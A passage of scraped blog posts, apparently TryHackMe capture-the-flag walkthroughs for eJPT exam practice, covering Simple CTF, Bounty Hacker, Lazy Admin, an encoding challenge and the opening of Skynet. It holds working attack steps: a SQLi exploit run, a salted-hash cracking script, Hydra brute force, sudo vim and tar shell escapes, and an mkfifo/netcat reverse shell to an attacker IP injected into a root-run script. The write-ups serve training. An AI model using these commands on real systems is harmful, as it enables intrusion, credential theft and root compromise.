10.201.40.102 -n -Pn -sS -p- --min-rate 5000 -oG allTCPports PORT STATE SERVICE 21/tcp open ftp 80/tcp open http 2222/tcp open EtherNetIP-1 Three open ports — more attack surface than previous machines. Port 2222 stands out: Nmap identifies it as EtherNetIP-1, but version scanning will reveal its true nature.\nTargeted scan with version detection and scripts:\nnmap 10.201.40.102 -n -Pn -sS -sVC -p21,80,2222 --min-rate 5000 -oN simplescan.txt PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) 80/tcp open http Apache httpd 2.4.18 (Ubuntu) | http-robots.txt: 2 disallowed entries |_/ /openemr-5_0_1_3 2222/tcp open ssh OpenSSH 7.2p2 Ubuntu Key findings:\nPort 21: vsftpd 3.0.3 with anonymous login enabled — first vector to explore Port 80: Apache with robots.txt mentioning /openemr-5_0_1_3 — possible CMS Port 2222: SSH running on non-standard port — admins sometimes move SSH to avoid bots, but it's not a real security measure Anonymous FTP enumeration Anonymous FTP login means we can connect without credentials:\nftp 10.201.40.102 21 Name: anonymous 230 Login successful. ftp> ls 229 Entering Extended Passive Mode (|||43213|) Passive mode issue: the FTP server enters extended passive mode but times out when listing directories. This is common when there are network restrictions between client and server. Anonymous FTP doesn't give us direct useful information here, but confirms lax security configuration on the server.\nWeb enumeration robots.txt Already detected by Nmap — we review it manually:\nUser-agent: * Disallow: / Disallow: /openemr-5_0_1_3 Possible user: the file comment mentions mike as original author. We note it for possible bruteforce later.\nFuzzing with Gobuster gobuster dir -u http://10.201.40.102 \\ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt \\ -t 50 -x php,txt,xml,html,bak /index.html (Status: 200) /robots.txt (Status: 200) /simple (Status: 301) /server-status (Status: 403) Key finding: /simple/ directory — navigating to http://10.201.40.102/simple/ we find CMS Made Simple. Reviewing the page source code we identify the version: 2.2.8.\nExploit search with Searchsploit With the CMS version identified, we search for known exploits:\nsearchsploit simple CMS 2.2.8 CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py CVE-2019-9053 — Unauthenticated time-based SQLi in CMS Made Simple versions prior to 2.2.10. No credentials needed to exploit it, making it especially dangerous.\nExploitation CVE-2019-9053: Time-based SQL Injection The original Searchsploit exploit is written in Python 2. Since we use Python 3, we need an adapted version. The exploit uses time-based blind SQLi to extract information character by character by measuring server response times.\nInstall dependencies:\npip install requests termcolor Run the exploit pointing to the CMS directory:\npython3 exploit.py -u http://10.201.40.102/simple/ [+] Salt for password found: 1dac0d92e9fa6bb2 [+] Username found: mitch [+] Email found: admin@admin.com [+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96 How does time-based SQLi work? The exploit injects SQL queries that include SLEEP() — if the condition is true, the server takes longer to respond. By measuring these delays, the script extracts the data one character at a time. Slower than direct SQLi but equally effective.\nSalted MD5 hash cracking The obtained hash is not a simple MD5 — it's salted with 1dac0d92e9fa6bb2. This means the hash is MD5(salt + password), not simply MD5(password). 
Standard tools like john or hashcat require special configuration for salted hashes, so we use a custom Python3 script:\n#!/usr/bin/env python3\nimport hashlib\nimport sys\n\ndef try_crack(salt, target_hash, wordlist_path):\n    # Normalise the target so the hex comparison is case-insensitive\n    target_hash = target_hash.strip().lower()\n    with open(wordlist_path, 'r', encoding='utf-8', errors='ignore') as f:\n        for line in f:\n            candidate = line.rstrip('\\n')\n            # CMS Made Simple stores MD5(salt + password), so prepend the salt\n            h = hashlib.md5((salt + candidate).encode('utf-8')).hexdigest()\n            if h == target_hash:\n                print(\"[+] Found (full match):\", candidate)\n                return candidate\n    print(\"[-] Not found in wordlist\")\n    return None\n\nif __name__ == '__main__':\n    if len(sys.argv) != 4:\n        sys.exit(\"usage: crack.py <salt> <md5_hash> <wordlist>\")\n    salt, target_hash, wordlist = sys.argv[1:4]\n    try_crack(salt, target_hash, wordlist)\npython3 crack.py 1dac0d92e9fa6bb2 0c01f4468bd75d7a84c7eb73846e8d96 /usr/share/wordlists/rockyou.txt [+] Found (full match): secret Credentials obtained: mitch:secret\nPost-exploitation SSH access With the obtained credentials, we access via SSH on the non-standard port:\nssh mitch@10.201.40.102 -p 2222 Welcome to Ubuntu 16.04.6 LTS mitch@Machine:~$ Stabilize the shell:\nexport TERM=xterm export SHELL=bash Identity and context id uid=1001(mitch) gid=1001(mitch) groups=1001(mitch) User flag cat ~/user.txt User flag: G00d j0b, keep up!\nSystem user enumeration ls /home mitch sunbath Another user exists: sunbath. Noted for possible lateral movement.\nSUID binary search find / -perm -4000 2>/dev/null No exploitable SUID binaries on this machine — all found are standard system binaries. We discard this vector and move on.\nSudo enumeration sudo -l User mitch may run the following commands on Machine: (root) NOPASSWD: /usr/bin/vim Critical finding: mitch can run vim as root without a password. Vim has the ability to execute shell commands internally — this is direct escalation.\nPrivilege Escalation Sudo vim abuse Vim allows executing operating system commands directly from its command mode with :!command. If we run it with sudo, those commands run as root:\nsudo vim -c ':!/bin/sh' # whoami root What does this command do?\nsudo vim opens vim with root privileges -c ':!/bin/sh' automatically executes the command :!/bin/sh on startup :! in vim executes system commands /bin/sh opens a shell — which inherits vim's root privileges Root flag cd /root cat root.txt Root flag: W3ll d0n3. You made it!\nLessons learned Anonymous FTP in production is bad practice — Although it didn't give direct access here, it confirms lax configurations. In real environments, anonymous FTP can expose sensitive files. Always find the exact CMS or web application version — CMS Made Simple 2.2.8 had a public SQLi. A real attacker would immediately query CVE databases after identifying the software and version. This information is in the page source code. Salted hashes require custom cracking — A simple MD5 hash is cracked with john or hashcat directly. A salted hash requires your tool to know the salt. Understanding how salted hashes work — and writing a script to crack them — is a differentiating skill. SSH on non-standard port is not security — Moving SSH to port 2222 only avoids basic bots. Nmap detects it in seconds with version scanning. Real security comes from SSH keys, 2FA, and service hardening. sudo -l always, always, always — In all four machines so far, sudo -l was the privesc vector or confirmed its absence. It's the first command you should run after getting a shell. GTFOBins for sudo — Vim, less, more, nano, python, perl... dozens of common tools can be used to escalate privileges if run via sudo. GTFOBins is the definitive reference. 
For the eJPT This machine exercises skills directly evaluated on the eJPT:\nMultiple service enumeration (FTP, HTTP, SSH) Web application version identification Public exploit usage (Searchsploit + CVE) Basic SQLi understanding Hash cracking (with and without salt) SSH access with obtained credentials Privilege escalation via sudo misconfigurations Approximate solving time: 40-60 minutes — time-based SQLi is slow by nature.\nReferences Simple CTF — TryHackMe CVE-2019-9053 — NVD GTFOBins — vim PayloadsAllTheThings — SQL Injection ","permalink":"https://r3df0x1-c.github.io/f0x1-blog/en/walkthroughs/road-to-ejpt/simple-ctf/","summary":"Simple CTF is the fourth machine in the Road to eJPTv2 series and the most technically varied so far. It introduces three new vectors: anonymous FTP access, SQLi exploitation with a real CVE (CVE-2019-9053) against CMS Made Simple, and privilege escalation via sudo vim. Additionally, the obtained hash is salted, requiring a custom cracking script — a differentiating skill.","title":"Simple CTF"},{"content":"Summary Bounty Hacker is the fifth machine in the Road to eJPTv2 series and one of the most straightforward in terms of attack flow. Anonymous FTP doesn't just confirm lax configurations — this time it directly delivers a password wordlist and the target username. With that data, Hydra does the heavy lifting against SSH. The escalation via sudo tar introduces a new GTFOBins binary worth knowing.\nAttribute Value Platform TryHackMe Difficulty Easy OS Linux Room Bounty Hacker Skills FTP Enum, SSH Bruteforce, Sudo Privesc (tar) 🎥 Video version If you prefer to follow the walkthrough step by step, keep reading. The video covers the same process in visual format.\nTools used nmap — port and service enumeration ftp — anonymous access and file download hydra — SSH bruteforce with wordlist obtained from FTP ssh — access with obtained credentials Solution overview Nmap reveals FTP (21), SSH (22) and HTTP (80) Anonymous FTP exposes two files: task.txt (user lin) and locks.txt (password wordlist) Hydra SSH bruteforce with lin and locks.txt → password RedDr4gonSynd1cat3 SSH access as lin → user flag sudo -l reveals lin can run /bin/tar as root sudo tar abuse with shell payload → root Reconnaissance Connectivity check ping -c 1 10.67.160.220 64 bytes from 10.67.160.220: icmp_seq=1 ttl=62 time=70.0 ms TTL=62 → target is Linux. The TTL is 62 instead of the usual 60 — this happens when there are one or two network hops between attacker and target. 
Still Linux.\nNmap port scan Initial sweep of all TCP ports:\nnmap 10.67.160.220 -n -Pn -sS -p- --open --min-rate=5000 -oG allTCPports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http Note on --open: this flag filters output showing only open ports, ignoring filtered or closed ones. Useful to avoid noise on machines with many filtered ports — like this one, which had 55531 filtered ports.\nTargeted scan with version detection and scripts:\nnmap 10.67.160.220 -n -Pn -sS -sCV -p21,22,80 --min-rate=5000 -oN scanBounty.txt PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.5 | ftp-anon: Anonymous FTP login allowed (FTP code 230) 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 80/tcp open http Apache httpd 2.4.41 (Ubuntu) Key findings:\nPort 21: vsftpd with anonymous login enabled — first vector to explore Port 22: SSH — potential bruteforce target if we find credentials Port 80: Apache — web review pending Anonymous FTP enumeration ftp 10.67.160.220 21 Name: anonymous 230 Login successful. ftp> ls -rw-rw-r-- 1 ftp ftp 418 Jun 07 2020 locks.txt -rw-rw-r-- 1 ftp ftp 68 Jun 07 2020 task.txt Two accessible files. We download them:\nftp> get locks.txt ftp> get task.txt We review their contents:\ntask.txt — task list signed by user lin:\n1.) Protect Vicious. 2.) Get Trophies on the shelf.\nCritical finding: the file is signed by lin — we have a valid system username.\nlocks.txt — list of possible passwords (custom wordlist):\nrEddrAGON ReDdr4gON RedDr4gonSynd1cat3 Ideal attacker scenario: the anonymous FTP server just handed us the username (lin) and its password wordlist (locks.txt). This is a critical misconfiguration — never expose sensitive files on anonymous FTP.\nExploitation SSH bruteforce with Hydra With the username and wordlist in hand, we launch Hydra against SSH:\nhydra -l lin -P ./locks.txt ssh://10.67.160.220 -t 4 Flag justification:\n-l lin single user (already known from task.txt) -P locks.txt custom wordlist obtained from FTP -t 4 4 parallel tasks (higher can cause SSH lockouts) [22][ssh] host: 10.67.160.220 login: lin password: RedDr4gonSynd1cat3 Credentials obtained: lin:RedDr4gonSynd1cat3\nThe attack finished in 10 seconds because the wordlist was small and targeted. This is the difference between a generic wordlist (rockyou.txt with 14 million entries) and a directed one — when you have the right wordlist, bruteforce is almost instant.\nSSH access ssh lin@10.67.160.220 Welcome to Ubuntu 20.04.6 LTS lin@ip-10-67-160-220:~$ Post-exploitation User flag cat ~/Desktop/user.txt User flag: THM{CR1M3_SyNd1C4T3}\nSudo enumeration sudo -l User lin may run the following commands on ip-10-67-160-220: (root) /bin/tar Critical finding: lin can run tar as root without a password. tar is a file archiver that under normal conditions should not have sudo permissions. GTFOBins documents exactly how to abuse this.\nPrivilege Escalation Sudo tar abuse tar has an -I flag that allows specifying an external program for compression/decompression. We can abuse this to execute arbitrary commands with root privileges:\nsudo tar xf /dev/null -I '/bin/sh -c \"sh <&2 1>&2\"' # whoami root What does this command do?\nsudo tar runs tar with root privileges xf /dev/null attempts to extract from /dev/null (empty file — doesn't fail but does nothing real) -I '/bin/sh -c \"sh <&2 1>&2\"' specifies a /bin/sh shell as the \"decompressor\" <&2 1>&2 redirects stdin from stderr and stdout to stderr — trick to get an interactive shell from tar Root flag cd /root cat root.txt Root flag: THM{80UN7Y_h4cK3r}\nLessons learned Anonymous FTP can be more dangerous than it looks — In previous machines (Simple CTF) anonymous FTP didn't give directly useful information. Here it delivered username and wordlist. Always list and download everything available on anonymous FTP before moving to the next vector. A targeted wordlist is exponentially more effective — locks.txt had 26 passwords. rockyou.txt has 14 million. Hydra found the password in 10 seconds with the right wordlist. In a real pentest, collecting target-specific information before launching bruteforce attacks makes all the difference. sudo -l is still the first post-shell command — Four machines in a row with privesc via sudo. The pattern is consistent: always the first thing you check. GTFOBins isn't just Python and Vim — tar, find, awk, perl, nmap... dozens of common binaries have escape techniques documented on GTFOBins. Learn to search there when you find an unusual binary with sudo or SUID. --open in Nmap is your friend — On machines with many filtered ports, the --open flag cleans output and focuses you on what matters. Use it when the first scan shows thousands of filtered ports. 
For the eJPT This machine exercises skills directly evaluated on the eJPT:\nAnonymous FTP enumeration with file extraction Directed SSH bruteforce with Hydra Privilege escalation via sudo misconfiguration Using GTFOBins as a privesc reference Approximate solving time: 15-20 minutes — one of the fastest machines in the series once you understand the flow.\nReferences Bounty Hacker — TryHackMe GTFOBins — tar Hydra documentation ","permalink":"https://r3df0x1-c.github.io/f0x1-blog/en/walkthroughs/road-to-ejpt/bounty-hacker/","summary":"Bounty Hacker is the fifth machine in the Road to eJPTv2 series and one of the most straightforward in terms of attack flow. Anonymous FTP doesn't just confirm lax configurations — this time it directly delivers a password wordlist and the target username. With that data, Hydra does the heavy lifting against SSH. The escalation via sudo tar introduces a new GTFOBins binary worth knowing.","title":"Bounty Hacker"},{"content":"Summary Lazy Admin is the sixth machine in the Road to eJPTv2 series and the most elaborate so far in terms of attack chain. There's no single vector — you have to chain: two-layer fuzzing to find the CMS, credential extraction from an exposed MySQL backup, MD5 hash cracking, admin panel access, reverse shell upload, and an indirect privilege escalation via sudo Perl that modifies an intermediate script.\nAttribute Value Platform TryHackMe Difficulty Easy OS Linux Room Lazy Admin Skills Web Enum, CMS Exploitation, Hash Cracking, File Upload, Sudo Privesc (Perl) 🎥 Video version If you prefer to follow the walkthrough step by step, keep reading. The video covers the same process in visual format.\nTools used nmap — port and service enumeration gobuster — two-layer directory fuzzing wget — MySQL backup download john — MD5 hash cracking netcat — reverse shell listener Solution overview Nmap reveals SSH (22) and HTTP (80) with Apache 2.4.18 Gobuster discovers /content/ — SweetRice CMS version 1.5.1 Second fuzzing on /content/ discovers /content/inc/ with exposed MySQL backup Backup contains user manager and MD5 hash: 42f749ade7f9e195bf475f37a44cafcb John cracks the hash → Password123 Access to SweetRice admin panel at /content/as/ PHP5 reverse shell upload via Media Center → shell as www-data sudo -l reveals www-data can run /usr/bin/perl /home/itguy/backup.pl backup.pl runs /etc/copy.sh — we modify copy.sh with mkfifo reverse shell Run script with sudo → root Reconnaissance Connectivity check ping -c 1 10.66.153.42 64 bytes from 10.66.153.42: icmp_seq=1 ttl=62 time=68.1 ms TTL=62 → target is Linux. 
Same as Bounty Hacker, TTL of 62 indicates one or two network hops between attacker and target.\nNmap port scan Initial sweep of all TCP ports:\nnmap 10.66.153.42 -n -Pn -sS -p- --open --min-rate=5000 -oG allTCPports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Only two ports. The entire attack goes through the web.\nTargeted scan with version detection and scripts:\nnmap 10.66.153.42 -n -Pn -sS -sCV -p22,80 --min-rate=5000 -oN escaneoLazy.txt PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 80/tcp open http Apache httpd 2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Key findings:\nPort 80: Apache 2.4.18 showing Ubuntu's default page. Hidden content waiting to be discovered with fuzzing. Port 22: SSH active — possible vector if we obtain valid credentials. Web Enumeration First fuzzing layer gobuster dir -u http://10.66.153.42 \\ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \\ -x php,html,txt,bak,xml /index.html (Status: 200) /content (Status: 301) Finding: /content/ directory containing SweetRice CMS version 1.5.1. This gives us a concrete target: search for known vulnerabilities in that specific version.\nSecond fuzzing layer on /content/ The first fuzzing only scratched the surface. We fuzz recursively inside /content/:\ngobuster dir -u http://10.66.153.42/content \\ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \\ -x html,php,css,xml,bak /index.php (Status: 200) /images (Status: 301) /js (Status: 301) /inc (Status: 301) /as (Status: 301) /_themes (Status: 301) /attachment (Status: 301) Two critical findings:\n/content/as/ → SweetRice administration panel /content/inc/ → directory with exposed internal CMS files Exploring /inc/ We access http://10.66.153.42/content/inc/ and find the directory with indexing enabled. Inside we find the mysql_backup/ subdirectory with a complete database backup. An exposed database backup on a web server is a critical vulnerability — it can contain credentials, user data, and system configuration.\nwget http://10.66.153.42/content/inc/mysql_backup/mysql_bakup_20191129023059-1.5.1.sql Credential extraction from backup We search for passwords inside the downloaded file:\ncat mysql_bakup_20191129023059-1.5.1.sql | grep passwd s:6:\"passwd\";s:32:\"42f749ade7f9e195bf475f37a44cafcb\" Credentials found:\nUsername: manager MD5 hash: 42f749ade7f9e195bf475f37a44cafcb Hash cracking with John We save the hash to a file and run John with rockyou:\necho \"42f749ade7f9e195bf475f37a44cafcb\" > manager.hash john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt manager.hash Password123 (?) Full credentials: manager:Password123\nExploitation Admin panel access With the cracked credentials we access the SweetRice panel:\nhttp://10.66.153.42/content/as/ Credentials manager:Password123 work. We get full access to the CMS dashboard.\nReverse Shell via Media Center SweetRice allows file uploads from the Media Center section. We upload a PHP5 reverse shell (.php5 or .phtml to bypass possible filters).\nWe set up a listener:\nnc -nlvp 4545 We upload the reverse shell from Media Center and navigate to the uploaded file URL. We receive the connection:\nconnect to [192.168.149.0] from (UNKNOWN) [10.66.153.42] 45420 uid=33(www-data) gid=33(www-data) groups=33(www-data) Shell stabilization This machine has Python3 available — we use the full stabilization method:\nwhich python3 python3 -c 'import pty; pty.spawn(\"/bin/bash\")' # Ctrl + Z stty raw -echo; fg reset xterm export TERM=xterm export SHELL=bash stty rows 40 cols 184 Why is this method better than just export SHELL=bash? pty.spawn creates a full pseudo-terminal, enabling Tab autocomplete, command history, and editors like nano or vi. It's the most complete stabilization available without additional tools.\nPost-exploitation User enumeration cat /etc/passwd | grep bash root:x:0:0:root:/root:/bin/bash itguy:x:1000:1000:THM-Chal:/home/itguy:/bin/bash System user: itguy.\nUser flag cd /home/itguy cat user.txt User flag: THM{63e5bce9271952aad1113b6f1ac28a07}\nInteresting files in itguy's home ls -l /home/itguy -rw-r--r-x 1 root root 47 Nov 29 2019 backup.pl -rw-rw-r-- 1 itguy itguy 16 Nov 29 2019 mysql_login.txt We review backup.pl:\ncat backup.pl #!/usr/bin/perl system(\"sh\", \"/etc/copy.sh\"); Key finding: backup.pl is a Perl script owned by root that executes /etc/copy.sh. If we can run backup.pl with sudo AND modify copy.sh, we have indirect escalation.\nSudo enumeration sudo -l User www-data may run the following commands on THM-Chal: (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl Attack plan confirmed: www-data can run backup.pl as root. backup.pl runs /etc/copy.sh. If /etc/copy.sh is writable by www-data, we can inject a reverse shell there and execute it as root via sudo perl backup.pl.\nWe verify /etc/copy.sh permissions:\nls -l /etc/copy.sh -rw-r--rwx 1 www-data www-data 81 Nov 29 2019 /etc/copy.sh /etc/copy.sh has world-writable permissions (rwx) — www-data can write to it. The chain is complete.\nPrivilege Escalation Escalation chain: sudo → Perl → Shell script The escalation works in two steps:\nModify /etc/copy.sh to execute a reverse shell Run backup.pl with sudo — which will call the modified copy.sh as root Step 1: Modify /etc/copy.sh We set up a listener on a new terminal:\nnc -nlvp 5555 We replace copy.sh content with an mkfifo reverse shell:\necho \"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.149.0 5555 >/tmp/f\" > /etc/copy.sh Step 2: Run backup.pl with sudo sudo /usr/bin/perl /home/itguy/backup.pl On our listening terminal we receive the connection as root:\n# whoami root Root flag cd /root cat root.txt Root flag: THM{6637f41d0177b6f37cb20d775124699f}\nLessons learned Single-layer fuzzing may not be enough — The first gobuster found /content/. Without the second fuzzing inside /content/, we would never have found /content/inc/ with the MySQL backup. On complex applications, always fuzz recursively on the most interesting directories. Database backups should never be in the webroot — A publicly accessible .sql file can contain credentials, user data, and critical system configuration. In a real pentest, this is a critical finding that gets reported immediately. Indirect escalation requires understanding the full chain — Here it wasn't sudo binary → shell directly. It was sudo perl → perl script → shell script → shell. Seeing the complete chain before executing is fundamental. Intermediate file permissions matter as much as direct ones — backup.pl was owned by root and unmodifiable. But copy.sh had world permissions (rwx). Security of the chain is only as strong as its weakest link. pty.spawn vs export SHELL=bash — When Python3 is available, always use full stabilization with pty.spawn. It gives you a functional shell with all terminal controls. Without this, commands like sudo -l can behave erratically. 
For the eJPT This machine exercises skills directly evaluated on the eJPT:\nMulti-layer web enumeration with Gobuster CMS identification and exploitation Credential extraction from exposed files MD5 hash cracking with John the Ripper Reverse shell upload via web admin panels Indirect privilege escalation via sudo + chained scripts File permission analysis to identify write vectors Approximate solving time: 45-60 minutes — most of the time in two-layer fuzzing and understanding the escalation chain.\nReferences Lazy Admin — TryHackMe GTFOBins — perl SweetRice CMS John the Ripper documentation PayloadsAllTheThings — Reverse Shell ","permalink":"https://r3df0x1-c.github.io/f0x1-blog/en/walkthroughs/road-to-ejpt/lazy-admin/","summary":"Lazy Admin is the sixth machine in the Road to eJPTv2 series and the most elaborate so far in terms of attack chain. There's no single vector — you have to chain: two-layer fuzzing to find the CMS, credential extraction from an exposed MySQL backup, MD5 hash cracking, admin panel access, reverse shell upload, and an indirect privilege escalation via sudo Perl that modifies an intermediate script.","title":"Lazy Admin"},{"content":"Summary c4ptur3-th3-fl4g is the seventh machine of the Road to eJPTv2 series and the most different one so far. No service exploitation, no reverse shells, no privesc. 
It\u0026rsquo;s a pure encoding, cryptography and steganography challenge — designed to get you comfortable with data representation systems that appear constantly in CTFs and forensic analysis.\nThis room covers: leetspeak, binary, Base32, Base64, hexadecimal, ROT13, ROT47, Morse code, BCD, Brainfuck/Malbolge, audio spectrograms and image steganography.\nAttribute Value Platform TryHackMe Difficulty Easy OS N/A (encoding challenge) Room c4ptur3-th3-fl4g Skills Encoding/Decoding, Steganography, Spectrograms, Basic OSINT 🎥 Video Walkthrough If you prefer to follow the walkthrough step by step, keep reading. The video covers the same process in visual format.\nTools Used CyberChef — swiss army knife for encoding/decoding Audacity — spectrogram visualization steghide — extracting hidden data from images binwalk — analysis of composite files Solution Overview This room is divided into four sections:\nTranslations \u0026amp; Shifting — 10 encoding/decoding challenges Spectrograms — hidden message in audio frequencies Steganography — data hidden inside an image Security through obscurity — file inside another file Section 1: Translations \u0026amp; Shifting This section presents 10 encoded strings that need to be decoded. The main tool is CyberChef (https://gchq.github.io/CyberChef/), which allows applying multiple transformations in a chain.\nChallenge 1: Leetspeak c4n y0u c4p7u23 7h3 f149?\nLeetspeak (l33tspeak) is a substitution of letters with visually similar numbers or symbols. Common in hacker culture since the 80s.\nLeetspeak Letter 4 a 0 o 7 t 2 r 3 e 1 i 9 g Answer: can you capture the flag?\nChallenge 2: Binary 01101100 01100101 01110100 01110011 00100000 01110100 01110010 01111001 00100000 01110011 01101111 01101101 01100101 00100000 01100010 01101001 01101110 01100001 01110010 01111001 00100000 01101111 01110101 01110100 00100001 Each group of 8 bits represents an ASCII character. 
In CyberChef: From Binary.\nAnswer: lets try some binary out!\nChallenge 3: Base32 MJQXGZJTGIQGS4ZAON2XAZLSEBRW63LNN5XCA2LOEBBVIRRHOM====== Base32 uses the A-Z and 2-7 alphabet, with = as padding. In CyberChef: From Base32.\nAnswer: base32 is super common in CTF's\nChallenge 4: Base64 RWFjaCBCYXNlNjQgZGlnaXQgcmVwcmVzZW50cyBleGFjdGx5IDYgYml0cyBvZiBkYXRhLg== Base64 uses A-Z, a-z, 0-9, +, / and = as padding. Recognizable by the == at the end. In CyberChef: From Base64.\nAnswer: Each Base64 digit represents exactly 6 bits of data.\nChallenge 5: Hexadecimal 68 65 78 61 64 65 63 69 6d 61 6c 20 6f 72 20 62 61 73 65 31 36 3f Each hex pair represents one byte. 20 is the space character in ASCII. In CyberChef: From Hex.\nAnswer: hexadecimal or base16?\nChallenge 6: ROT13 Ebgngr zr 13 cynprf! ROT13 shifts each letter 13 positions in the alphabet. Applied twice it returns to the original (it is its own inverse). In CyberChef: ROT13.\nAnswer: Rotate me 13 places!\nChallenge 7: ROT47 *@F DA:? \u0026gt;6 C:89E C@F?5 323J C:89E C@F?5 Wcf E:\u0026gt;6DX ROT47 is like ROT13 but applies to 94 printable ASCII characters (from 33 to 126), not just letters. That\u0026rsquo;s why it can encrypt symbols, numbers and letters. In CyberChef: ROT47.\nAnswer: You spin me right round baby right round (47 times)\nChallenge 8: Morse Code . .-.. . -.-. --- -- -- ..- -. .. -.-. .- - .. --- -. . -. -.-. --- -.. .. -. --. Morse code uses dots and dashes to represent letters. In CyberChef: From Morse Code.\nAnswer: TELECOMMUNICATION ENCODING\nChallenge 9: BCD (Binary Coded Decimal) 85 110 112 97 99 107 32 116 104 105 115 32 66 67 68 BCD represents each decimal digit with its bit equivalent. These values are directly decimal ASCII codes. In CyberChef: From Charcode (decimal base).\nAnswer: Unpack this BCD\nChallenge 10: Multi-layer string LS0tLS0gLi0tLS0g... 
This string requires decoding in multiple layers:\nBase64 → produces Morse code Morse → produces plain text In CyberChef: From Base64 → From Morse Code.\nAnswer: Let's make this a bit trickier...\nSection 2: Spectrograms A spectrogram is a visual representation of the frequencies of an audio signal over time. Messages can be hidden in audio by setting the volume of specific frequencies to form letters or images when viewed in a spectrogram.\nProcess Download the audio file from the room Open it in Audacity In the audio track, click on the track name → select \u0026ldquo;Spectrogram\u0026rdquo; The spectrogram will reveal text visible in the frequencies Answer: Super Secret Message\nSection 3: Steganography Steganography hides information inside other files — images, audio, video — in a way that is not visible to the naked eye. Unlike cryptography (which encrypts the message), steganography hides the existence of the message.\nProcess Download the image from the room Use steghide to extract hidden data: steghide extract -sf image.jpg If it has a passphrase, try with an empty string (press Enter without typing anything) The extracted file contains the answer Answer: SpaghettiSteg\nSection 4: Security through obscurity This section shows how attackers (and defenders) can hide files inside other files — a technique used in both malware and CTFs.\nChallenge 1: File inside a file Download the file from the room Use binwalk to see what\u0026rsquo;s inside: binwalk file Extract the content: binwalk -e file Inside you will find the hidden file First hidden file: hackerchat.png\nChallenge 2: Hidden text inside the file With the extracted file, inspect it: strings hackerchat.png Or open it with a hex editor and look for plain text at the end of the file.\nHidden text: AHH_YOU_FOUND_ME!\nQuick Encoding Reference This table summarizes the most common encodings in CTFs:\nEncoding Visual characteristic Tool Binary Only 0s and 1s in groups of 8 CyberChef: From Binary Hexadecimal 
Characters 0-9 and a-f in pairs CyberChef: From Hex Base32 Uppercase + 2-7, padding with = CyberChef: From Base32 Base64 A-Z, a-z, 0-9, +/, padding == CyberChef: From Base64 ROT13 Readable text but shifted CyberChef: ROT13 ROT47 Symbols mixed with text CyberChef: ROT47 Morse Dots, dashes and spaces CyberChef: From Morse Leetspeak Numbers mixed with letters Manual inspection Lessons Learned CyberChef is indispensable for CTFs — Most of the encodings in this room are solved in seconds with CyberChef. Learning to chain operations in CyberChef is a fundamental skill for any CTF player. Recognizing encodings at a glance saves time — == at the end → Base64. Uppercase with 2-7 → Base32. Dots and dashes → Morse. 0s and 1s in groups of 8 → Binary. Building this visual recognition is essential. Steganography isn\u0026rsquo;t just images — Information can be hidden in audio (spectrograms), video, PDF documents, ZIP files, and more. Whenever you have a file in a CTF, ask yourself: is there something hidden here? binwalk and strings are your first commands with unknown files — strings shows readable text inside any binary file. binwalk detects embedded files. Use them before opening any suspicious file. Security through obscurity is not real security — Hiding files inside others or changing extensions does not protect data. An attacker with binwalk or strings finds it in seconds. Real security requires encryption, not concealment. For the eJPT Although the eJPT focuses more on network and system exploitation, the concepts from this room are relevant for:\nRecognizing encoded data in web application responses (Base64 in cookies, JWT tokens, etc.) 
Basic forensic analysis in post-exploitation Understanding how information is hidden in files Approximate completion time: 30-45 minutes with CyberChef open and the encoding reference at hand.\nReferences c4ptur3-th3-fl4g — TryHackMe CyberChef — GCHQ Audacity steghide documentation binwalk documentation GTFOBins ","permalink":"https://r3df0x1-c.github.io/f0x1-blog/en/walkthroughs/road-to-ejpt/c4ptur3-th3-fl4g/","summary":"\u003ch2 id=\"summary\"\u003eSummary\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003ec4ptur3-th3-fl4g\u003c/strong\u003e is the seventh machine of the \u003cem\u003eRoad to eJPTv2\u003c/em\u003e series and the most different one so far. No service exploitation, no reverse shells, no privesc. It\u0026rsquo;s a pure \u003cstrong\u003eencoding, cryptography and steganography\u003c/strong\u003e challenge — designed to get you comfortable with data representation systems that appear constantly in CTFs and forensic analysis.\u003c/p\u003e\n\u003cp\u003eThis room covers: leetspeak, binary, Base32, Base64, hexadecimal, ROT13, ROT47, Morse code, BCD, Brainfuck/Malbolge, audio spectrograms and image steganography.\u003c/p\u003e","title":"c4ptur3-th3-fl4g"},{"content":"Summary Skynet is the eighth machine of the Road to eJPTv2 series and one of the most complete in the path. It combines SMB enumeration, brute force against a webmail, exploitation of a CMS with Remote File Inclusion, and a classic privilege escalation based on tar wildcard injection in a cron job.\nA chained attack flow where each phase depends on the previous one — exactly the kind of reasoning the eJPT evaluates.\nAttribute Value Platform TryHackMe Difficulty Medium OS Linux (Ubuntu) Room Skynet Skills SMB Enum, Brute Force, RFI, Tar Wildcard PrivEsc 🎥 Video Walkthrough If you prefer to follow the walkthrough step by step, keep reading. 
The video covers the same process in visual format.\nTools Used nmap — port scanning and version detection smbmap / smbclient — SMB share enumeration gobuster — web directory fuzzing hydra — HTTP form brute force searchsploit — local exploit search netcat — reverse shell listener python3 — shell stabilization Solution Overview Recon: nmap reveals SMB, HTTP and mail services. Anonymous SMB exposes a password wordlist. Web enumeration: gobuster finds /squirrelmail. Brute force: Hydra uses the SMB wordlist to compromise milesdyson\u0026rsquo;s webmail. Email pivot: The inbox contains milesdyson\u0026rsquo;s SMB password. Authenticated SMB: The personal share reveals a hidden web directory. Cuppa CMS: A second gobuster run finds an admin panel with a known RFI vulnerability. Reverse shell: RFI executes a PHP payload hosted on our machine. User flag: Access as www-data allows reading /home/milesdyson/user.txt. PrivEsc: backup.sh runs tar * as root via cron — we exploit the wildcard to set SUID on /bin/bash. 
